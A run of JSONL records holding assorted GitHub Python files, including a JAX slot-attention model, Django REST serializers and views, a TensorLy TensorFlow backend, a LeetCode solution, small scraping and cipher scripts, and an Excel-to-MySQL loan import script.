self.territories:\n\t\t\treturn_string += ',\\t' + str(territory)\n\t\treturn_string += '\\nUnits:'\n\t\tfor unit in self.units:\n\t\t\treturn_string += ',\\t' + str(unit)\n\t\treturn return_string\n","repo_name":"Lakuna/Diplomat","sub_path":"data/classes/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33456136868","text":"from typing import List\n\nclass Solution:\n def findAllConcatenatedWordsInADict(self, words: List[str]) -> List[str]:\n # sets have O(1) lookup compared to O(n) lookup for lists\n # can probably speed this up even further by caching isConcat calls \n # but this suffices\n swords = set(words)\n def isConcat(word):\n for i in range(1, len(word)):\n if word[:i] in swords:\n if word[i:] in swords or isConcat(word[i:]):\n return True\n return False\n \n out = []\n for word in words:\n if isConcat(word):\n out.append(word)\n return out","repo_name":"Corncycle/leetcode-solutions","sub_path":"concatenated-words.py","file_name":"concatenated-words.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44133688438","text":"'''Code adapted from https://github.com/google-research/slot-attention-video'''\n\"\"\"Slot Attention model for object discovery and set prediction.\"\"\"\nimport logging\nimport haiku as hk\nimport jax.numpy as jnp\nimport jax\nimport time\nimport optax\nimport os\nfrom slot_attention.sa_utils import load_model, newest\n\nclass SlotAttention(hk.Module):\n \"\"\"Slot Attention module.\"\"\"\n# rng_key: jax.interpreters.xla.DeviceArray\n\n def __init__(self, num_iterations, num_slots, slot_size, mlp_hidden_size,\n key, epsilon=1e-8):\n \"\"\"Builds the Slot Attention module.\n\n Args:\n num_iterations: Number of iterations.\n num_slots: Number of slots.\n slot_size: Dimensionality of slot feature vectors.\n mlp_hidden_size: Hidden layer size of MLP.\n epsilon: Offset for attention coefficients before normalization.\n \"\"\"\n super().__init__()\n self.num_iterations = num_iterations\n self.num_slots = num_slots\n self.slot_size = slot_size\n self.mlp_hidden_size = mlp_hidden_size\n self.epsilon = epsilon\n self.key = key\n self.norm_inputs = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n self.norm_slots = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n self.norm_mlp = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n\n # Parameters for Gaussian init (shared by all slots).\n mu_init = hk.initializers.VarianceScaling(1.0, \"fan_avg\", \"uniform\")\n self.slots_mu = mu_init(\n [1, 1, self.slot_size],\n jnp.float32)\n sigma_init = hk.initializers.VarianceScaling(1.0, \"fan_avg\", \"uniform\")\n self.slots_log_sigma = sigma_init(\n [1, 1, self.slot_size],\n jnp.float32)\n\n # Linear maps for the attention module.\n self.project_q = hk.Linear(self.slot_size, with_bias=False, name=\"q\")\n self.project_k = hk.Linear(self.slot_size, with_bias=False, name=\"k\")\n self.project_v = hk.Linear(self.slot_size, with_bias=False, name=\"v\")\n\n # Slot update functions.\n self.gru = hk.GRU(self.slot_size)\n self.mlp = hk.Sequential([\n hk.Linear(self.mlp_hidden_size),\n jax.nn.relu,\n hk.Linear(self.slot_size)\n ], name=\"mlp\")\n\n def __call__(self, inputs):\n # `inputs` has shape [batch_size, num_inputs, inputs_size].\n inputs = self.norm_inputs(inputs) # Apply layer norm to the input.\n k = self.project_k(inputs) # Shape: [batch_size, num_inputs, slot_size].\n v = self.project_v(inputs) # Shape: [batch_size, num_inputs, slot_size].\n\n # Initialize the slots. Shape: [batch_size, num_slots, slot_size].\n slots = self.slots_mu + jnp.exp(self.slots_log_sigma) * jax.random.normal(\n self.key, [jnp.shape(inputs)[0], self.num_slots, self.slot_size])\n\n # Multiple rounds of attention.\n for _ in range(self.num_iterations):\n slots_prev = slots\n slots = self.norm_slots(slots)\n\n # Attention.\n q = self.project_q(slots) # Shape: [batch_size, num_slots, slot_size].\n q *= self.slot_size ** -0.5 # Normalization.\n attn_logits = jnp.einsum('ijk,ihk->ijh', k, q)\n attn = jax.nn.softmax(attn_logits, axis=-1)\n # `attn` has shape: [batch_size, num_inputs, num_slots].\n\n # Weigted mean.\n attn += self.epsilon\n attn /= jnp.sum(attn, axis=-2, keepdims=True)\n updates = jnp.einsum('ijk,ijh->ikh', attn, v)\n # `updates` has shape: [batch_size, num_slots, slot_size].\n # Slot update.\n slots, encoded_state = hk.dynamic_unroll(self.gru,updates,self.gru.initial_state(updates.shape[0]),time_major=False)\n #slots, _ = self.gru(updates,self.gru.initial_state(updates.shape[0]))\n slots += self.mlp(self.norm_mlp(slots))\n\n return slots\n\n\ndef spatial_broadcast(slots, resolution):\n \"\"\"Broadcast slot features to a 2D grid and collapse slot dimension.\"\"\"\n # `slots` has shape: [batch_size, num_slots, slot_size].\n slots = jnp.reshape(slots, [-1, slots.shape[-1]])[:, None, None, :]\n grid = jnp.tile(slots, [1, resolution[0], resolution[1], 1])\n # `grid` has shape: [batch_size*num_slots, width, height, slot_size].\n return grid\n\n\ndef spatial_flatten(x):\n return jnp.reshape(x, [-1, x.shape[1] * x.shape[2], x.shape[-1]])\n\n\ndef unstack_and_split(x, batch_size, num_channels=3):\n \"\"\"Unstack batch dimension and split into channels and alpha mask.\"\"\"\n unstacked = jnp.reshape(x, [batch_size, -1] + list(x.shape)[1:])\n c1,c2,c3,masks = jnp.split(unstacked, unstacked.shape[-1], axis=-1)\n channels = jnp.concatenate([c1,c2,c3],axis=-1)\n return channels, masks\n\n\nclass SlotAttentionAutoEncoder(hk.Module):\n \"\"\"Slot Attention-based auto-encoder for object discovery.\"\"\"\n\n def __init__(self, resolution, num_slots, num_iterations, key):\n \"\"\"Builds the Slot Attention-based auto-encoder.\n\n Args:\n resolution: Tuple of integers specifying width and height of input image.\n num_slots: Number of slots in Slot Attention.\n num_iterations: Number of iterations in Slot Attention.\n \"\"\"\n super().__init__()\n self.resolution = resolution\n self.num_slots = num_slots\n self.num_iterations = num_iterations\n self.key = key\n self.encoder_cnn = hk.Sequential([\n hk.Conv2D(32, kernel_shape=5, padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2D(32, kernel_shape=5, padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2D(64, kernel_shape=5, padding=\"SAME\"),\n jax.nn.relu,\n ], name=\"encoder_cnn\")\n\n self.decoder_initial_size = (8, 8)\n self.decoder_cnn = hk.Sequential([\n hk.Conv2DTranspose(\n 64, 5, stride=(2, 2), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 32, 5, stride=(2, 2), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 32, 5, stride=(2, 2), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 32, 5, stride=(1, 1), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 4, 3, stride=(1, 1), padding=\"SAME\")\n ], name=\"decoder_cnn\")\n\n self.encoder_pos = SoftPositionEmbed(64, self.resolution)\n self.decoder_pos = SoftPositionEmbed(64, self.decoder_initial_size)\n\n self.layer_norm = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n self.mlp = hk.Sequential([\n hk.Linear(64),\n jax.nn.relu,\n hk.Linear(64)\n ], name=\"feedforward\")\n\n self.slot_attention = SlotAttention(\n num_iterations=self.num_iterations,\n num_slots=self.num_slots,\n slot_size=64,\n mlp_hidden_size=128,key=self.key)\n\n def __call__(self, image):\n # `image` has shape: [batch_size, width, height, num_channels].\n\n # Convolutional encoder with position embedding.\n x = self.encoder_cnn(image) # CNN Backbone.\n x = self.encoder_pos(x) # Position embedding.\n x = spatial_flatten(x) # Flatten spatial dimensions (treat image as set).\n x = self.mlp(self.layer_norm(x)) # Feedforward network on set.\n # `x` has shape: [batch_size, width*height, input_size].\n\n # Slot Attention module.\n slots = self.slot_attention(x)\n # `slots` has shape: [batch_size, num_slots, slot_size].\n\n # Spatial broadcast decoder.\n x = spatial_broadcast(slots, self.decoder_initial_size)\n # `x` has shape: [batch_size*num_slots, width_init, height_init, slot_size].\n x = self.decoder_pos(x)\n x = self.decoder_cnn(x)\n\n # `x` has shape: [batch_size*num_slots, width, height, num_channels+1].\n\n # Undo combination of slot and batch dimension; split alpha masks.\n recons, masks = unstack_and_split(x, batch_size=image.shape[0])\n # `recons` has shape: [batch_size, num_slots, width, height, num_channels].\n # `masks` has shape: [batch_size, num_slots, width, height, 1].\n\n # Normalize alpha masks over slots.\n masks = jax.nn.softmax(masks, axis=1)\n recon_combined = jnp.sum(recons * masks, axis=1) # Recombine image.\n # `recon_combined` has shape: [batch_size, width, height, num_channels].\n return recon_combined, recons, masks, slots\n\ndef build_grid(resolution):\n ranges = [jnp.linspace(0., 1., num=res) for res in resolution]\n grid = jnp.meshgrid(*ranges, sparse=False, indexing=\"ij\")\n grid = jnp.stack(grid, axis=-1)\n grid = jnp.reshape(grid, [resolution[0], resolution[1], -1])\n grid = jnp.expand_dims(grid, axis=0)\n grid = grid.astype(jnp.float32)\n return jnp.concatenate([grid, 1.0 - grid], axis=-1)\n\n\nclass SoftPositionEmbed():\n \"\"\"Adds soft positional embedding with learnable projection.\"\"\"\n\n def __init__(self, hidden_size, resolution):\n \"\"\"Builds the soft position embedding layer.\n\n Args:\n hidden_size: Size of input feature dimension.\n resolution: Tuple of integers specifying width and height of grid.\n \"\"\"\n super().__init__()\n self.dense = hk.Linear(hidden_size, with_bias=True)\n self.grid = build_grid(resolution)\n\n def __call__(self, inputs):\n return inputs + self.dense(self.grid)\n\n\nclass SlotAttentionModel:\n def __init__(self, args, key):\n '''Initialize Model'''\n self.resolution = (args.sa_resolution, args.sa_resolution)\n self.args = args\n self.optimizer_slots = optax.inject_hyperparams(optax.adam)(learning_rate=args.sa_learning_rate, eps_root=1e-8)\n self.network = self.build_forward_fn(key)\n self.train_slots = jax.jit(self.train_slots)\n\n def init_network(self, model_dir, key, batch, step_number=None):\n '''Build the Network'''\n if step_number is None:\n checkpoint = newest(model_dir)\n else:\n checkpoint = model_dir+f'{step_number}'\n if checkpoint is not None:\n print('Found Model')\n global_step = int(checkpoint.split('/')[-1])\n params = load_model(checkpoint)\n else:\n print('Training from Scratch')\n global_step = 0\n params = self.network.init(key, batch)\n optimizer_state = self.optimizer_slots.init(params)\n return params, optimizer_state, global_step\n\n def build_forward_fn(self, key) -> hk.Transformed:\n def forward_fn(batch):\n module = SlotAttentionAutoEncoder(self.resolution, self.args.sa_num_slots, self.args.sa_num_iterations, key)\n return module(batch)\n return hk.transform(forward_fn)\n\n def mse_loss(self, params, key, batch):\n preds = self.network.apply(params, key, batch)\n recon_combined, _, _, _ = preds\n loss = jnp.mean((recon_combined - batch)**2)\n return loss\n\n def train_slots(self, params, batch, key, optimizer_state):\n # Perform a single training step.\n loss, param_grads = jax.value_and_grad(self.mse_loss)(params, key, batch)\n updates, optimizer_state = self.optimizer_slots.update(param_grads, optimizer_state)\n params = optax.apply_updates(params, updates)\n return loss, params, optimizer_state\n","repo_name":"Somjit77/oc_gvfs","sub_path":"slot_attention/model_jax.py","file_name":"model_jax.py","file_ext":"py","file_size_in_byte":11497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32272580048","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\ntxt_file = open('allLanguagesUsed.txt', 'w')\nanos = [\"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\"]\nallLanguages = []\n\nfor ano in anos:\n url = \"https://www.go-hero.net/jam/\" + ano + \"/languages\"\n print(\"New request: \" + url)\n html = urllib.request.urlopen(url)\n soup = BeautifulSoup(html, \"html.parser\")\n table = soup.table\n\n for tr in table.find_all('tr')[1:]:\n lang = tr.td.text\n if lang not in allLanguages:\n allLanguages.append(lang)\n\n\nallLanguages.sort()\n\nfor l in allLanguages:\n txt_file.write(l + \"\\n\")\n","repo_name":"Tiaghoul/iic-GoogleJamStudy","sub_path":"findAllLanguages.py","file_name":"findAllLanguages.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35378561507","text":"try:\n import tensorflow as tf\n import tensorflow.math as tfm\n import tensorflow.experimental.numpy as tnp\nexcept ImportError as error:\n message = (\n \"Impossible to import TensorFlow.\\n\"\n \"To use TensorLy with the TensorFlow backend, \"\n \"you must first install TensorFlow!\"\n )\n raise ImportError(message) from error\n\nimport numpy as np\n\nfrom .core import Backend, backend_types, backend_basic_math, backend_array\n\n\nclass TensorflowBackend(Backend, backend_name=\"tensorflow\"):\n @staticmethod\n def context(tensor):\n return {\"dtype\": tensor.dtype}\n\n @staticmethod\n def tensor(data, dtype=np.float64, device=None, device_id=None):\n if isinstance(data, tf.Tensor) or isinstance(data, tf.Variable):\n return tf.cast(data, dtype=dtype)\n\n out = tf.Variable(data, dtype=dtype)\n return out.gpu(device_id) if device == \"gpu\" else out\n\n @staticmethod\n def is_tensor(tensor):\n return isinstance(tensor, tf.Tensor) or isinstance(tensor, tf.Variable)\n\n @staticmethod\n def to_numpy(tensor):\n if isinstance(tensor, np.ndarray):\n return tensor\n elif isinstance(tensor, tf.Tensor):\n return tensor.numpy()\n elif isinstance(tensor, tf.Variable):\n return tf.convert_to_tensor(tensor).numpy()\n else:\n return tensor\n\n @staticmethod\n def shape(tensor):\n return tuple(tensor.shape.as_list())\n\n @staticmethod\n def norm(tensor, order=2, axis=None):\n if order == \"inf\":\n order = np.inf\n return tf.norm(tensor=tensor, ord=order, axis=axis)\n\n @staticmethod\n def solve(lhs, rhs):\n squeeze = False\n if rhs.ndim == 1:\n squeeze = [-1]\n rhs = tf.reshape(rhs, (-1, 1))\n res = tf.linalg.solve(lhs, rhs)\n if squeeze:\n res = tf.squeeze(res, squeeze)\n return res\n\n @staticmethod\n def clip(tensor, a_min=None, a_max=None):\n return tnp.clip(tensor, a_min, a_max)\n\n @staticmethod\n def lstsq(a, b):\n n = a.shape[1]\n if tf.rank(b) == 1:\n x = tf.squeeze(tf.linalg.lstsq(a, tf.expand_dims(b, -1), fast=False), -1)\n else:\n x = tf.linalg.lstsq(a, b, fast=False)\n residuals = tf.norm(tf.tensordot(a, x, 1) - b, axis=0) ** 2\n return x, residuals if tf.linalg.matrix_rank(a) == n else tf.constant([])\n\n def svd(self, matrix, full_matrices):\n \"\"\"Correct for the atypical return order of tf.linalg.svd.\"\"\"\n S, U, V = tf.linalg.svd(matrix, full_matrices=full_matrices)\n return U, S, tf.transpose(a=V)\n\n def index_update(self, tensor, indices, values):\n if not isinstance(tensor, tf.Variable):\n tensor = tf.Variable(tensor)\n to_tensor = True\n else:\n to_tensor = False\n\n if isinstance(values, int):\n values = tf.constant(\n np.ones(self.shape(tensor[indices])) * values, **self.context(tensor)\n )\n\n tensor = tensor[indices].assign(values)\n\n if to_tensor:\n return tf.convert_to_tensor(tensor)\n else:\n return tensor\n\n @staticmethod\n def logsumexp(tensor, axis=0):\n return tfm.reduce_logsumexp(tensor, axis=axis)\n\n\n# Register numpy functions\nfor name in [\"nan\"]:\n TensorflowBackend.register_method(name, getattr(np, name))\n\n\n# Register linalg functions\nfor name in [\"diag\", \"qr\", \"eigh\", \"trace\"]:\n TensorflowBackend.register_method(name, getattr(tf.linalg, name))\n\n\n# Register tfm functions\nTensorflowBackend.register_method(\"digamma\", getattr(tfm, \"digamma\"))\n\n\n# Register tnp functions\nfor name in (\n backend_types\n + backend_basic_math\n + backend_array\n + [\n \"log2\",\n \"concatenate\",\n \"flip\",\n \"dot\",\n \"argmin\",\n \"argmax\",\n \"conj\",\n \"tensordot\",\n \"stack\",\n \"copy\",\n \"max\",\n \"sign\",\n \"mean\",\n \"sum\",\n \"moveaxis\",\n \"ndim\",\n \"arange\",\n \"sort\",\n \"argsort\",\n \"flip\",\n \"stack\",\n \"transpose\",\n ]\n):\n TensorflowBackend.register_method(name, getattr(tnp, name))\n","repo_name":"tensorly/tensorly","sub_path":"tensorly/backend/tensorflow_backend.py","file_name":"tensorflow_backend.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":1459,"dataset":"github-code","pt":"67"} +{"seq_id":"42406845631","text":"from rest_framework.serializers import ModelSerializer, HyperlinkedIdentityField, SerializerMethodField\n#from django.shortcuts import render\nfrom posts.models import Post\nfrom comments.models import Comment\nfrom comments.api.serializers import CommentListSerializer, CommentDetailSerializer\nfrom accounts.api.serializers import UserDetailSerializer\n#from rest_framework.request import Request\n\npost_detail_url = HyperlinkedIdentityField(view_name = 'posts-api:detail', lookup_field = 'slug',)# context={'request':request})\npost_update_url = HyperlinkedIdentityField(view_name = 'posts-api:update', lookup_field = 'slug',)\npost_delete_url = HyperlinkedIdentityField(view_name = 'posts-api:delete', lookup_field = 'slug',)\n\nclass PostListSerializer(ModelSerializer):\n\turl = post_detail_url\n\tuser = UserDetailSerializer(read_only=True)\n\tcomment_count = SerializerMethodField()\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\t\t'title',\n\t\t\t\t\t#'slug',\n\t\t\t\t\t'url',\n\t\t\t\t\t'content',\n\t\t\t\t\t'publish',\n\t\t\t\t\t#'id',\n\t\t\t\t\t'user',\n\t\t\t\t\t'comment_count',\n\t\t\t\t\t\t\t\t]\n\tdef get_user(self, obj):\n\t\treturn str(obj.user.username)\n\n\tdef get_comment_count(self, obj):\n\t\tcomment_queryset = Comment.objects.filter_by_instance(obj)\n\t\tparent_comment_count = comment_queryset.count()\n\t\treply_count = 0\n\t\tfor comment in comment_queryset:\n\t\t\tif comment.is_parent:\n\t\t\t\treply_count += comment.children().count()\n\t\t\telse:\n\t\t\t\treply_count += 2\n\t\t\t\treturn reply_count\n\t\tcomment_count = parent_comment_count + reply_count\n\t\treturn comment_count\n\nclass PostDetailSerializer(ModelSerializer):\n\turl = post_detail_url\n\tupdate_url = post_update_url\n\tdelete_url = post_delete_url\n\tuser = UserDetailSerializer(read_only=True)\n\timage = SerializerMethodField()\n\thtml = SerializerMethodField()\n\t#comments = CommentDetailSerializer(comment_qs)\n\t#comments = SerializerMethodField()\n\tcomment_count = SerializerMethodField()\n\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\t\t'title',\n\t\t\t\t\t'slug',\n\t\t\t\t\t'url',\n\t\t\t\t\t'update_url',\n\t\t\t\t\t'delete_url',\n\t\t\t\t\t'image',\n\t\t\t\t\t'content',\n\t\t\t\t\t'html',\n\t\t\t\t\t'publish',\n\t\t\t\t\t'user',\n\t\t\t\t\t#'comments',\n\t\t\t\t\t'comment_count',\n\t\t\t\t\t#'id',\n\t\t\t\t\t\t\t\t\t]\n\n\tdef get_user(self, obj):\n\t\treturn str(obj.user.username)\n\n\tdef get_html(self, obj):\n\t\treturn obj.get_markdown()\t#defined in models\n\n\tdef get_image(self, obj):\n\t\ttry:\n\t\t\timage = obj.image.url\n\t\texcept:\n\t\t\timage = None\n\t\treturn image\n\n\tdef get_comments(self, obj):\n\t\t#content_type = obj.get_content_type\n\t\t#object_id = obj.id\n\t\tcomment_queryset = Comment.objects.filter_by_instance(obj)\n\t\tcomments = CommentListSerializer(comment_queryset, many=True).data\n\t\treturn comments\n\n\tdef get_comment_count(self, obj):\n\t\tcomment_queryset = Comment.objects.filter_by_instance(obj)\n\t\tparent_comment_count = comment_queryset.count()\n\t\treply_count = 0\n\t\tfor comment in comment_queryset:\n\t\t\tif comment.is_parent:\n\t\t\t\treply_count += comment.children().count()\n\t\t\telse:\n\t\t\t\treply_count += 0\n\t\t\t\treturn reply_count\n\t\tcomment_count = parent_comment_count + reply_count\n\t\treturn comment_count\n\nclass PostCreateUpdateSerializer(ModelSerializer):\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\t\t'title',\n\t\t\t\t\t'content',\n\t\t\t\t\t'publish',\n\t\t\t\t\t\t\t\t\t]\n","repo_name":"Yobmod/dmldjangoREST","sub_path":"src/posts/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28755313518","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_http_methods, require_safe, require_POST\nfrom .models import SampleModel\nfrom .forms import SampleModelForm\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n@require_safe\ndef index(request):\n forms = SampleModel.objects.order_by('pk')\n context = {\n 'forms': forms,\n }\n return render(request, 'community/index.html', context)\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef create(request):\n if request.method == 'POST': # 받은 정보를 렌더링해서 create한다\n form = SampleModelForm(request.POST)\n if form.is_valid():\n article = form.save()\n return redirect('community:detail', article.pk)\n else: # 기본 폼을 보낸다\n form = SampleModelForm()\n context = {\n 'form': form,\n }\n return render(request, 'community/create.html', context)\n\n@require_safe\ndef detail(request, pk):\n article = get_object_or_404(SampleModel, pk=pk)\n context = {\n 'article': article\n }\n return render(request, 'community/detail.html', context)\n\n@login_required\n@require_POST\ndef delete(request, pk):\n if request.method == 'POST':\n article = get_object_or_404(SampleModel, pk=pk)\n article.delete()\n return redirect('community:index')\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef update(request, pk):\n article = get_object_or_404(SampleModel, pk=pk)\n if request.method == 'POST':\n form = SampleModelForm(request.POST, instance=article)\n if form.is_valid():\n form.save()\n return redirect('community:detail', article.pk)\n else:\n form = SampleModelForm(instance=article)\n context= {\n 'article': article,\n 'form': form,\n }\n return render(request, 'community/update.html', context)\n\n\n \n\n","repo_name":"gkska741/Studies","sub_path":"삼성소프트웨어아카데미/Django/project01/community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69890060374","text":"from model import System\nfrom gradient import *\nfrom analysis import HolisticFPAnalysis, HolisticGlobalEDFAnalysis\nfrom assignment import PDAssignment, HOPAssignment, repr_priorities,EQFAssignment, EQSAssignment\nfrom vector import VectorHolisticFPBatchCosts, MappingPrioritiesMatrix, PrioritiesMatrix\nfrom evaluation import SchedRatioEval\nfrom examples import get_system\nfrom random import Random\nfrom fast_analysis import FastHolisticFPAnalysis\nfrom functools import partial\nimport generator\n\n\ndef gdpa(system: System) -> bool:\n analysis = HolisticFPAnalysis(limit_factor=10, reset=False)\n extractor = PriorityExtractor()\n cost_function = InvslackCost(extractor=extractor, analysis=analysis)\n stop_function = StandardStop(limit=100)\n delta_function = AvgSeparationDelta(factor=1.5)\n batch_cost_function = VectorHolisticFPBatchCosts(PrioritiesMatrix())\n gradient_function = StandardGradient(delta_function=delta_function,\n batch_cost_function=batch_cost_function)\n update_function = NoisyAdam()\n optimizer = StandardGradientDescent(extractor=extractor,\n cost_function=cost_function,\n stop_function=stop_function,\n gradient_function=gradient_function,\n update_function=update_function,\n verbose=False)\n\n pd = PDAssignment(normalize=True)\n pd.apply(system)\n optimizer.apply(system)\n analysis.apply(system)\n return system.is_schedulable()\n\n\ndef pd(system: System) -> bool:\n analysis = HolisticFPAnalysis(limit_factor=10, reset=False)\n pd = PDAssignment(normalize=True)\n pd.apply(system)\n analysis.apply(system)\n return system.is_schedulable()\n\n\ndef gdpa_mapping(system: System) -> bool:\n test = HolisticFPAnalysis(limit_factor=1, reset=True)\n analysis = HolisticFPAnalysis(limit_factor=10, reset=False)\n extractor = MappingPriorityExtractor()\n cost_function = InvslackCost(extractor=extractor, analysis=analysis)\n stop_function = StandardStop(limit=200)\n delta_function = AvgSeparationDelta(factor=1.5)\n batch_cost_function = VectorHolisticFPBatchCosts(MappingPrioritiesMatrix())\n gradient_function = StandardGradient(delta_function=delta_function,\n batch_cost_function=batch_cost_function)\n update_function = NoisyAdam(lr=1.5, beta1=0.9, beta2=0.999, epsilon=0.1, gamma=0.5)\n optimizer = StandardGradientDescent(extractor=extractor,\n cost_function=cost_function,\n stop_function=stop_function,\n gradient_function=gradient_function,\n update_function=update_function,\n verbose=False)\n\n pd = PDAssignment(normalize=True)\n pd.apply(system)\n optimizer.apply(system)\n\n test.apply(system)\n return system.is_schedulable()\n\n\nif __name__ == '__main__':\n # create population of examples\n rnd = Random(42)\n size = (3, 4, 3) # flows, tasks, procs\n n = 50\n systems = [get_system(size, rnd, balanced=False, name=str(i),\n deadline_factor_min=0.5,\n deadline_factor_max=1) for i in range(n)]\n\n # utilizations between 50 % and 90 %\n utilizations = np.linspace(0.5, 0.9, 20)\n\n tools = [(\"pd\", pd),\n (\"gdpa\", gdpa),\n (\"gdpa-mapping\", gdpa_mapping)]\n\n labels, funcs = zip(*tools)\n runner = SchedRatioEval(\"mapping(42)-unbalanced2\", labels=labels, funcs=funcs, systems=systems,\n utilizations=utilizations, threads=6,\n preprocessor=generator.unbalance, utilization_func=generator.set_system_utilization)\n runner.run()\n","repo_name":"rivasjm/pyrta","sub_path":"workspaces/mapping/mapping_eval.py","file_name":"mapping_eval.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16575101126","text":"# Run with python3\n\nalphabets = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nstring_input = input(\"Enter the string: \").upper()\n\nstring_output = \"\"\n\nfor i in range(len(string_input)):\n\tc = string_input[i]\n\tlocation = alphabets.find(c)\n\tnew_location = (location + 13)%26\n\t#if new_location >= 26:\n\t#\tnew_location -= 26\n\tstring_output += alphabets[new_location]\n\nprint(\"Encrypted string: \",string_output)\n","repo_name":"neWbie-saby/Encryption-Methods","sub_path":"CAESARROT13.py","file_name":"CAESARROT13.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16671949115","text":"# https://www.acmicpc.net/problem/2960\n\ndef get_primes(n, k):\n is_prime = [True] * (n + 1)\n is_prime[0] = False\n is_prime[1] = False\n cnt = 0\n for i in range(2, n + 1):\n for j in range(i, n + 1, i):\n if is_prime[j]:\n is_prime[j] = False\n cnt += 1\n if cnt == k:\n return j\n\n\n\nimport sys\ninput = sys.stdin.readline\nn, k = map(int, input().split())\nprint(get_primes(n, k))","repo_name":"kjh03160/Algorithm_Basic","sub_path":"practice/ETC/Erastotenes_2960.py","file_name":"Erastotenes_2960.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14669583136","text":"import numpy as np\nimport torch\nfrom . import helper\nfrom .envs import make_vec_envs\n\ndef evaluate(\n num_evals, \n uni_agent, \n ob_rms,\n env_name, \n init_robots,\n seed=1, \n device=None):\n\n eval_envs = make_vec_envs(env_name, init_robots, seed, None, device, ret=False, ob=True)\n vec_norm = helper.get_vec_normalize(eval_envs)\n \n if vec_norm is not None:\n vec_norm.eval()\n vec_norm.ob_rms = ob_rms\n\n # recorders\n eval_episode_rewards = []\n\n obs = eval_envs.reset()\n while True:\n with torch.no_grad():\n val, action, logp = uni_agent.uni_act(obs, mean_action=True)\n obs, rewards, done, infos = eval_envs.step(action)\n for info in infos:\n if 'episode' in info.keys():\n eval_episode_rewards.append(info['episode']['r'])\n # check\n if num_evals*len(init_robots) == len(eval_episode_rewards):\n break\n eval_envs.close()\n print(\"Evalution done!\")\n return np.average(eval_episode_rewards)\n\n ","repo_name":"Caiyishuai/ModularEvoGym","sub_path":"examples/transformer_ppo/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"42062926367","text":"import xlrd\nimport mysql.connector\nimport datetime\n\ndata = xlrd.open_workbook(\"20191128_Data Dump.xlsx\")\nloans_sheet = data.sheet_by_name(\"loans\")\n\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"increasecapital\",\n password=\"password\",\n database=\"loan_db\",\n)\n\n\ncursor = db.cursor()\n\n# Creating a database\n# cursor.execute(\"CREATE DATABASE loan_db\")\n\n# Creating tables in the database\n# cursor.execute(\n# \"CREATE TABLE loans (loan_date DATE, due_date DATE, loan_code BIGINT(20), loan_amount BIGINT(20), loan_status VARCHAR(50), customer_id BIGINT(20), customer_station VARCHAR(50))\"\n# )\n\n# cursor.execute(\"SHOW TABLES\")\n\n# for tb in cursor:\n# print(tb)\n\n# Create the INSERT INTO sql query\nquery = \"\"\"INSERT INTO loans (loan_date, due_date, loan_code, loan_amount, loan_status, customer_id, customer_station) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\"\"\n\nprint (loans_sheet.cell(1, 5).value)\n\nfor r in range(1, loans_sheet.nrows):\n loan_date_as_float = loans_sheet.cell(r, 0).value\n loan_date = datetime.datetime(\n *xlrd.xldate_as_tuple(loan_date_as_float, data.datemode)\n )\n due_date_as_float = loans_sheet.cell(r, 1).value\n due_date = datetime.datetime(\n *xlrd.xldate_as_tuple(due_date_as_float, data.datemode)\n )\n loan_code = loans_sheet.cell(r, 2).value\n loan_amount = loans_sheet.cell(r, 3).value\n loan_status = loans_sheet.cell(r, 4).value\n customer_id = loans_sheet.cell(r, 5).value\n customer_station = loans_sheet.cell(r, 6).value\n\n values = (\n loan_date,\n due_date,\n loan_code,\n loan_amount,\n loan_status,\n customer_id,\n customer_station,\n )\n\n cursor.execute(query, values)\n\ncursor.close()\n\ndb.commit()\n\ndb.close()\n\ncolumns = str(loans_sheet.ncols)\nrows = str(loans_sheet.nrows)\n\nprint(\"I just imported {} columns and {} rows\").format(columns, 